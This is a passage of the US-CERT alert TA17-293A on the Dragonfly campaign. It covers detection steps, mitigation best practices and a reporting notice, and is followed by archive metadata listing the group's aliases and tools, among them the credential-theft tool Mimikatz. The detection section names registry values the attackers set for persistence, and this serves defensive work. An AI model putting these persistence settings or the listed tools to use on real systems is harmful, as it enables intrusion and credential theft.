intrusion detection system/network intrusion protection system  logs,\r\nweb content logs,\r\nproxy server logs,\r\ndomain name server resolution logs,\r\npacket capture (PCAP) repositories,\r\nfirewall logs,\r\nworkstation Internet browsing history logs,\r\nhost-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,\r\ndata loss prevention logs,\r\nexchange server logs,\r\nuser mailboxes,\r\nmail filter logs,\r\nmail content logs,\r\nAV mail logs,\r\nOWA logs,\r\nBlackberry Enterprise Server logs, and\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 12 of 15\n\nMobile Device Management logs.\r\nTo detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes\r\nlisted in the IOC packages with the following locations:\r\napplication logs,\r\nIIS/Apache logs,\r\nfile system,\r\nintrusion detection system/ intrusion prevention system logs,\r\nPCAP repositories,\r\nfirewall logs, and\r\nreverse proxy.\r\nDetect spear-phishing by searching workstation file systems, as well as network-based user directories, for\r\nattachment filenames and hashes found in the IOC packages.\r\nDetect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.\r\nDetect evasion techniques by the threat actors by identifying deleted logs. This can be done by reviewing last-seen\r\nentries and by searching for event 104 on Windows system logs.\r\nDetect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially\r\nthose created recently.\r\nDetect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for\r\nall users. Any unusual login times should be reviewed by the account owners.\r\nDetect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s\r\ncredentials suspected to be compromised.\r\nDetect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.\r\nDetect spear-phishing through a network by validating all new email accounts created on mail servers, especially\r\nthose with external user access.\r\nDetect persistence on servers by searching system logs for all filenames listed in the IOC packages.\r\nDetect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1”\r\ncontained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior\r\nto the activity.)\r\nDetect persistence by reviewing all installed applications on critical systems for unauthorized applications,\r\nspecifically note FortiClient VPN and Python 2.7.\r\nDetect persistence by searching for the value of “REG_DWORD 100” at registry location\r\n“HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal”. Services\\MaxInstanceCount” and the value of\r\n“REG_DWORD 1” at location\r\n“HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\dontdisplaylastusername”.\r\nDetect installation by searching all proxy logs for downloads from URIs without domain names.\r\nGeneral Best Practices Applicable to this Campaign:\r\nPrevent external communication of all versions of SMB and related protocols at the network boundary by blocking\r\nTCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best\r\nPractices for more information.\r\nBlock the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the\r\nnetwork.\r\nMonitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple\r\nconcurrent logins).\r\nDeploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources,\r\nand addresses; block these before receiving and downloading messages. This action will help to reduce the attack\r\nsurface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at\r\nthe mail gateway) with a reputable anti-virus solution that includes cloud reputation services.\r\nSegment any critical networks or control systems from business systems and networks according to industry best\r\npractices.\r\nEnsure adequate logging and visibility on ingress and egress points.\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 13 of 15\n\nEnsure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide\r\nadequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging,\r\nscript block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and\r\nanalysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.\r\nImplement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A –\r\nCompromised Web Servers and Web Shells – Threat Awareness and Guidance.\r\nEstablish a training mechanism to inform end users on proper email and web usage, highlighting current information\r\nand analysis, and including common indicators of phishing. End users should have clear instructions on how to report\r\nunusual or suspicious emails.\r\nImplement application directory whitelisting. System administrators may implement application or application\r\ndirectory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults\r\nallow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software\r\nfolders. All other locations should be disallowed unless an exception is granted.\r\nBlock RDP connections originating from untrusted external addresses unless an exception exists; routinely review\r\nexceptions on a regular basis for validity.\r\nStore system logs of mission critical systems for at least one year within a security information event management\r\ntool.\r\nEnsure applications are configured to log the proper level of detail for an incident response investigation.\r\nConsider implementing HIPS or other controls to prevent unauthorized code execution.\r\nEstablish least-privilege controls.\r\nReduce the number of Active Directory domain and enterprise administrator accounts.\r\nBased on the suspected level of compromise, reset all user, administrator, and service account credentials across all\r\nlocal and domain systems.\r\nEstablish a password policy to require complex passwords for all users.\r\nEnsure that accounts for network administration do not have external connectivity.\r\nEnsure that network administrators use non-privileged accounts for email and Internet access.\r\nUse two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and\r\nhigh-risk environments (e.g., remote access, privileged access, and access to sensitive data).\r\nImplement a process for logging and auditing activities conducted by privileged accounts.\r\nEnable logging and alerting on privilege escalations and role changes.\r\nPeriodically conduct searches of publically available information to ensure no sensitive information has been\r\ndisclosed. Review photographs and documents for sensitive data that may have inadvertently been included.\r\nAssign sufficient personnel to review logs, including records of alerts.\r\nComplete independent security (as opposed to compliance) risk review.\r\nCreate and participate in information sharing programs.\r\nCreate and maintain network and system documentation to aid in timely incident response. Documentation should\r\ninclude network diagrams, asset owners, type of asset, and an incident response plan.\r\nReport Notice\r\nDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to\r\nDHS or law enforcement immediately. To request incident response resources or technical assistance, contact CISA Central\r\nat contact@mail.cisa.dhs.gov or 1-844-Say-CISA.\r\nReferences\r\n[2] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017.\r\n[2] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017.\r\n[5] MIFR-10127623\r\nRevisions\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 14 of 15\n\nOctober 20, 2017: Initial version|March 15, 2018: Updated to provide guidance that this alert has been superseded by newer\r\ninformation.\r\nSource: https://www.us-cert.gov/ncas/alerts/TA17-293A\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.us-cert.gov/ncas/alerts/TA17-293A" ], "report_names": [ "TA17-293A" ], "threat_actors": [ { "id": "649b5b3e-b16e-44db-91bc-ae80b825050e", "created_at": "2022-10-25T15:50:23.290412Z", "updated_at": "2026-04-10T02:00:05.257022Z", "deleted_at": null, "main_name": "Dragonfly", "aliases": [ "TEMP.Isotope", "DYMALLOY", "Berserk Bear", "TG-4192", "Crouching Yeti", "IRON LIBERTY", "Energetic Bear", "Ghost Blizzard" ], "source_name": "MITRE:Dragonfly", "tools": [ "MCMD", "Impacket", "CrackMapExec", "Backdoor.Oldrea", "Mimikatz", "PsExec", "Trojan.Karagany", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "90307967-d5eb-4b7b-b8de-6fa2089a176e", "created_at": "2022-10-25T15:50:23.501119Z", "updated_at": "2026-04-10T02:00:05.347826Z", "deleted_at": null, "main_name": "Dragonfly 2.0", "aliases": [ "Dragonfly 2.0", "IRON LIBERTY", "DYMALLOY", "Berserk Bear" ], "source_name": "MITRE:Dragonfly 2.0", "tools": [ "netsh", "Impacket", "MCMD", "CrackMapExec", "Trojan.Karagany", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "1a76ed30-4daf-4817-98ae-87c667364464", "created_at": "2022-10-25T16:47:55.891029Z", "updated_at": "2026-04-10T02:00:03.646466Z", "deleted_at": null, "main_name": "IRON LIBERTY", "aliases": [ "ALLANITE ", "ATK6 ", "BROMINE ", "CASTLE ", "Crouching Yeti ", "DYMALLOY ", "Dragonfly ", "Energetic Bear / Berserk Bear ", "Ghost Blizzard ", "TEMP.Isotope ", "TG-4192 " ], "source_name": "Secureworks:IRON LIBERTY", "tools": [ "ClientX", "Ddex Loader", "Havex", "Karagany", "Loek", "MCMD", "Sysmain", "xfrost" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "e2a4bc0b-6745-4e55-9d7c-3d169d70b025", "created_at": "2022-10-25T16:07:23.386907Z", "updated_at": "2026-04-10T02:00:04.576815Z", "deleted_at": null, "main_name": "Berserk Bear", "aliases": [ "Berserk Bear", "Dragonfly 2.0", "Dymalloy", "G0074" ], "source_name": "ETDA:Berserk Bear", "tools": [ "Fuerboos", "Goodor", "Impacket", "Karagany", "Karagny", "LOLBAS", "LOLBins", "Living off the Land", "Phishery", "Trojan.Karagany", "Trojan.Phisherly", "xFrost" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439095, "ts_updated_at": 1775792184, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f3426320cabc355f756fd039f450b88f535b5e6f.pdf", "text": "https://archive.orkl.eu/f3426320cabc355f756fd039f450b88f535b5e6f.txt", "img": "https://archive.orkl.eu/f3426320cabc355f756fd039f450b88f535b5e6f.jpg" } }